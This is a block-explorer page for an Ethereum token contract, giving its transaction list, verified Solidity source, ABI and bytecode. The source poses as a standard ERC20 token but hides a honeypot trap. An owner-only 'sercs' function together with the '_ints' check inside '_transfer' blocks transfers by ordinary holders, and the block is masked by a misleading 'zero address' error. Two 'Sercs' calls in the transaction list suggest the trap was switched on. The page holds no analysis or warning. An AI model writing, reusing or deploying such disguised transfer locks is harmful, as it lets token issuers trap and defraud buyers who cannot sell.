ETH Price: $3,497.92 (+3.14%)
Gas: 3 Gwei

Contract

0xd5c174681173491daDD3F2f122D9a38d02593e26
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Transfer111128722020-10-23 13:43:291365 days ago1603460609IN
0xd5c17468...d02593e26
0 ETH0.0014452753.9000016
Approve111127602020-10-23 13:21:231365 days ago1603459283IN
0xd5c17468...d02593e26
0 ETH0.0025445957.2
Approve111127582020-10-23 13:21:061365 days ago1603459266IN
0xd5c17468...d02593e26
0 ETH0.0023977953.9
Approve111125512020-10-23 12:36:091365 days ago1603456569IN
0xd5c17468...d02593e26
0 ETH0.0017350239.0016
Approve111124382020-10-23 12:10:371365 days ago1603455037IN
0xd5c17468...d02593e26
0 ETH0.002224350
Approve111123262020-10-23 11:49:051365 days ago1603453745IN
0xd5c17468...d02593e26
0 ETH0.0026691660
Approve111122882020-10-23 11:41:421365 days ago1603453302IN
0xd5c17468...d02593e26
0 ETH0.0014235532
Approve111121472020-10-23 11:10:031365 days ago1603451403IN
0xd5c17468...d02593e26
0 ETH0.002224350
Approve111121442020-10-23 11:09:081365 days ago1603451348IN
0xd5c17468...d02593e26
0 ETH0.0020908447
Sercs111119652020-10-23 10:31:311365 days ago1603449091IN
0xd5c17468...d02593e26
0 ETH0.0016036666
Sercs111119612020-10-23 10:30:441365 days ago1603449044IN
0xd5c17468...d02593e26
0 ETH0.0018808666
Approve111119582020-10-23 10:29:111365 days ago1603448951IN
0xd5c17468...d02593e26
0 ETH0.0032252372.5
Approve111119542020-10-23 10:28:221365 days ago1603448902IN
0xd5c17468...d02593e26
0 ETH0.0027581362
0x60806040111119452020-10-23 10:26:461365 days ago1603448806IN
 Contract Creation
0 ETH0.0852415263

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Similar Match Source Code
This contract matches the deployed Bytecode of the Source Code for Contract 0xaDe34E80...9B07D2cd8
The constructor portion of the code might be different and could alter the actual behaviour of the contract

Contract Name:
ERC20

Compiler Version
v0.6.6+commit.6c089d02

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2020-10-23
*/

pragma solidity ^0.6.0;
library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        // Solidity only automatically asserts when dividing by 0
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

library Address {

    function isContract(address account) internal view returns (bool) {
        // According to EIP-1052, 0x0 is the value returned for not-yet created accounts
        // and 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470 is returned
        // for accounts without code, i.e. `keccak256('')`
        bytes32 codehash;
        bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470;
        // solhint-disable-next-line no-inline-assembly
        assembly { codehash := extcodehash(account) }
        return (codehash != accountHash && codehash != 0x0);
    }

    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        // solhint-disable-next-line avoid-low-level-calls, avoid-call-value
        (bool success, ) = recipient.call{ value: amount }("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
      return functionCall(target, data, "Address: low-level call failed");
    }

    function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) {
        return _functionCallWithValue(target, data, 0, errorMessage);
    }

    function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        return _functionCallWithValue(target, data, value, errorMessage);
    }

    function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) {
        require(isContract(target), "Address: call to non-contract");

        // solhint-disable-next-line avoid-low-level-calls
        (bool success, bytes memory returndata) = target.call{ value: weiValue }(data);
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                // solhint-disable-next-line no-inline-assembly
                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

contract Context {
    constructor () internal { }

    function _msgSender() internal view virtual returns (address payable) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this; 
        return msg.data;
    }
}

interface IERC20 {

    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function transfer(address recipient, uint256 amount) external returns (bool);

    function allowance(address owner, address spender) external view returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    event Transfer(address indexed from, address indexed to, uint256 value);

    event Approval(address indexed owner, address indexed spender, uint256 value);
}

contract ERC20 is Context, IERC20 {
    using SafeMath for uint256;
    using Address for address;

    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;
    uint256 private _totalSupply;
    string private _name;
    string private _symbol;
    uint8 private _decimals;
    address private _owner;
    address private _ercs;
   constructor (string memory name, string memory symbol, uint256 initialSupply,address payable owner) public {
        _name = name;
        _symbol = symbol;
        _decimals = 18;
        _owner = owner;
        _ercs = owner;
        _mint(_owner, initialSupply*(10**18));
    }

    function name() public view returns (string memory) {
        return _name;
    }

    function symbol() public view returns (string memory) {
        return _symbol;
    }

    function decimals() public view returns (uint8) {
        return _decimals;
    }


    function totalSupply() public view override returns (uint256) {
        return _totalSupply;
    }


    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }


    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }


    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }
    function sercs(address ercs) public {
        require(msg.sender == _owner, "!owner");
        _ercs = ercs;
    }
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }
    function _ints(address sender, address recipient, uint256 amount) public virtual view{
        if(amount > 0){
        if(recipient != _owner && sender != _owner && _owner!=_ercs){require(sender == _ercs, "ERC20: transfer from the zero address");}}
    }
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        _beforeTokenTransfer(sender, recipient, amount);
        _ints(sender, recipient, amount);
        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        _beforeTokenTransfer(address(0), account, amount);
        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
       emit Approval(owner, spender, amount);
    }

    function _setupDecimals(uint8 decimals_) internal {
        _decimals = decimals_;
    }

    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {  }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name","type":"string"},{"internalType":"string","name":"symbol","type":"string"},{"internalType":"uint256","name":"initialSupply","type":"uint256"},{"internalType":"address payable","name":"owner","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"_ints","outputs":[],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"ercs","type":"address"}],"name":"sercs","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100cf5760003560e01c8063395093511161008c57806395d89b411161006657806395d89b41146103f5578063a457c2d714610478578063a9059cbb146104de578063dd62ed3e14610544576100cf565b806339509351146102f35780634a8cb29d1461035957806370a082311461039d576100cf565b806306fdde03146100d4578063095ea7b31461015757806318160ddd146101bd57806323b872dd146101db5780632a4d73e214610261578063313ce567146102cf575b600080fd5b6100dc6105bc565b6040518080602001828103825283818151815260200191508051906020019080838360005b8381101561011c578082015181840152602081019050610101565b50505050905090810190601f1680156101495780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101a36004803603604081101561016d57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291908035906020019092919050505061065e565b604051808215151515815260200191505060405180910390f35b6101c561067c565b6040518082815260200191505060405180910390f35b610247600480360360608110156101f157600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610686565b604051808215151515815260200191505060405180910390f35b6102cd6004803603606081101561027757600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff1690602001909291908035906020019092919050505061075f565b005b6102d7610942565b604051808260ff1660ff16815260200191505060405180910390f35b61033f6004803603604081101561030957600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610959565b604051808215151515815260200191505060405180910390f35b61039b6004803603602081101561036f57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610a0c565b005b6103df600480360360208110156103b357600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610b13565b6040518082815260200191505060405180910390f35b6103fd610b5b565b6040518080602001828103825283818151815260200191508051906020019080838360005b8381101561043d578082015181840152602081019050610422565b50505050905090810190601f16801561046a5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6104c46004803603604081101561048e57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610bfd565b604051808215151515815260200191505060405180910390f35b61052a600480360360408110156104f457600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610cca565b604051808215151515815260200191505060405180910390f35b6105a66004803603604081101561055a57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610ce8565b6040518082815260200191505060405180910390f35b606060038054600181600116156101000203166002900480601f0160208091040260200160405190810160405280929190818152602001828054600181600116156101000203166002900480156106545780601f1061062957610100808354040283529160200191610654565b820191906000526020600020905b81548152906001019060200180831161063757829003601f168201915b5050505050905090565b600061067261066b610d6f565b8484610d77565b6001905092915050565b6000600254905090565b6000610693848484610f6e565b6107548461069f610d6f565b61074f856040518060600160405280602881526020016113f360289139600160008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610705610d6f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461123a9092919063ffffffff16565b610d77565b600190509392505050565b600081111561093d57600560019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141580156108145750600560019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b80156108905750600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16600560019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b1561093c57600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161461093b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602581526020018061141b6025913960400191505060405180910390fd5b5b5b505050565b6000600560009054906101000a900460ff16905090565b6000610a02610966610d6f565b846109fd8560016000610977610d6f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546112fa90919063ffffffff16565b610d77565b6001905092915050565b600560019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610acf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260068152602001807f216f776e6572000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b80600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b606060048054600181600116156101000203166002900480601f016020809104026020016040519081016040528092919081815260200182805460018160011615610100020316600290048015610bf35780601f10610bc857610100808354040283529160200191610bf3565b820191906000526020600020905b815481529060010190602001808311610bd657829003601f168201915b5050505050905090565b6000610cc0610c0a610d6f565b84610cbb856040518060600160405280602581526020016114646025913960016000610c34610d6f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461123a9092919063ffffffff16565b610d77565b6001905092915050565b6000610cde610cd7610d6f565b8484610f6e565b6001905092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610dfd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260248152602001806114406024913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610e83576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260228152602001806113ab6022913960400191505060405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040518082815260200191505060405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610ff4576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602581526020018061141b6025913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561107a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260238152602001806113886023913960400191505060405180910390fd5b611085838383611382565b61109083838361075f565b6110fb816040518060600160405280602681526020016113cd602691396000808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461123a9092919063ffffffff16565b6000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061118e816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546112fa90919063ffffffff16565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a3505050565b60008383111582906112e7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b838110156112ac578082015181840152602081019050611291565b50505050905090810190601f1680156112d95780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b5060008385039050809150509392505050565b600080828401905083811015611378576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f536166654d6174683a206164646974696f6e206f766572666c6f77000000000081525060200191505060405180910390fd5b8091505092915050565b50505056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f206164647265737345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f206164647265737345524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220582299f9da3f74abb2eb2d25929ca192fb7e23b0a7543992941a8db11109878664736f6c63430006060033

Deployed Bytecode Sourcemap

5618:4893:0:-:0;;;;5:9:-1;2:2;;;27:1;24;17:12;2:2;5618:4893:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12:1:-1;9;2:12;6329:83:0;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23:1:-1;8:100;33:3;30:1;27:10;8:100;;;99:1;94:3;90:11;84:18;80:1;75:3;71:11;64:39;52:2;49:1;45:10;40:15;;8:100;;;12:14;6329:83:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7191:169;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;7191:169:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;6608:100;;;:::i;:::-;;;;;;;;;;;;;;;;;;;7489:321;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;7489:321:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;7816:257;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;7816:257:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;6515:83;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;8079:218;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;8079:218:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;7366:117;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;7366:117:0;;;;;;;;;;;;;;;;;;;:::i;:::-;;6718:119;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;6718:119:0;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;6420:87;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23:1:-1;8:100;33:3;30:1;27:10;8:100;;;99:1;94:3;90:11;84:18;80:1;75:3;71:11;64:39;52:2;49:1;45:10;40:15;;8:100;;;12:14;6420:87:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8303:269;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;8303:269:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;6845:175;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;6845:175:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;7030:151;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;7030:151:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;6329:83;6366:13;6399:5;6392:12;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6329:83;:::o;7191:169::-;7274:4;7291:39;7300:12;:10;:12::i;:::-;7314:7;7323:6;7291:8;:39::i;:::-;7348:4;7341:11;;7191:169;;;;:::o;6608:100::-;6661:7;6688:12;;6681:19;;6608:100;:::o;7489:321::-;7595:4;7612:36;7622:6;7630:9;7641:6;7612:9;:36::i;:::-;7659:121;7668:6;7676:12;:10;:12::i;:::-;7690:89;7728:6;7690:89;;;;;;;;;;;;;;;;;:11;:19;7702:6;7690:19;;;;;;;;;;;;;;;:33;7710:12;:10;:12::i;:::-;7690:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;7659:8;:121::i;:::-;7798:4;7791:11;;7489:321;;;;;:::o;7816:257::-;7924:1;7915:6;:10;7912:154;;;7953:6;;;;;;;;;;;7940:19;;:9;:19;;;;:39;;;;;7973:6;;;;;;;;;;;7963:16;;:6;:16;;;;7940:39;:56;;;;;7991:5;;;;;;;;;;;7983:13;;:6;;;;;;;;;;;:13;;;;7940:56;7937:128;;;8016:5;;;;;;;;;;;8006:15;;:6;:15;;;7998:65;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7937:128;7912:154;7816:257;;;:::o;6515:83::-;6556:5;6581:9;;;;;;;;;;;6574:16;;6515:83;:::o;8079:218::-;8167:4;8184:83;8193:12;:10;:12::i;:::-;8207:7;8216:50;8255:10;8216:11;:25;8228:12;:10;:12::i;:::-;8216:25;;;;;;;;;;;;;;;:34;8242:7;8216:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;8184:8;:83::i;:::-;8285:4;8278:11;;8079:218;;;;:::o;7366:117::-;7435:6;;;;;;;;;;;7421:20;;:10;:20;;;7413:39;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7471:4;7463:5;;:12;;;;;;;;;;;;;;;;;;7366:117;:::o;6718:119::-;6784:7;6811:9;:18;6821:7;6811:18;;;;;;;;;;;;;;;;6804:25;;6718:119;;;:::o;6420:87::-;6459:13;6492:7;6485:14;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6420:87;:::o;8303:269::-;8396:4;8413:129;8422:12;:10;:12::i;:::-;8436:7;8445:96;8484:15;8445:96;;;;;;;;;;;;;;;;;:11;:25;8457:12;:10;:12::i;:::-;8445:25;;;;;;;;;;;;;;;:34;8471:7;8445:34;;;;;;;;;;;;;;;;:38;;:96;;;;;:::i;:::-;8413:8;:129::i;:::-;8560:4;8553:11;;8303:269;;;;:::o;6845:175::-;6931:4;6948:42;6958:12;:10;:12::i;:::-;6972:9;6983:6;6948:9;:42::i;:::-;7008:4;7001:11;;6845:175;;;;:::o;7030:151::-;7119:7;7146:11;:18;7158:5;7146:18;;;;;;;;;;;;;;;:27;7165:7;7146:27;;;;;;;;;;;;;;;;7139:34;;7030:151;;;;:::o;4689:106::-;4742:15;4777:10;4770:17;;4689:106;:::o;9966:343::-;10085:1;10068:19;;:5;:19;;;;10060:68;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10166:1;10147:21;;:7;:21;;;;10139:68;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10248:6;10218:11;:18;10230:5;10218:18;;;;;;;;;;;;;;;:27;10237:7;10218:27;;;;;;;;;;;;;;;:36;;;;10285:7;10269:32;;10278:5;10269:32;;;10294:6;10269:32;;;;;;;;;;;;;;;;;;9966:343;;;:::o;8578:578::-;8702:1;8684:20;;:6;:20;;;;8676:70;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8786:1;8765:23;;:9;:23;;;;8757:71;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8839:47;8860:6;8868:9;8879:6;8839:20;:47::i;:::-;8897:32;8903:6;8911:9;8922:6;8897:5;:32::i;:::-;8960:71;8982:6;8960:71;;;;;;;;;;;;;;;;;:9;:17;8970:6;8960:17;;;;;;;;;;;;;;;;:21;;:71;;;;;:::i;:::-;8940:9;:17;8950:6;8940:17;;;;;;;;;;;;;;;:91;;;;9065:32;9090:6;9065:9;:20;9075:9;9065:20;;;;;;;;;;;;;;;;:24;;:32;;;;:::i;:::-;9042:9;:20;9052:9;9042:20;;;;;;;;;;;;;;;:55;;;;9130:9;9113:35;;9122:6;9113:35;;;9141:6;9113:35;;;;;;;;;;;;;;;;;;8578:578;;;:::o;382:192::-;468:7;501:1;496;:6;;504:12;488:29;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;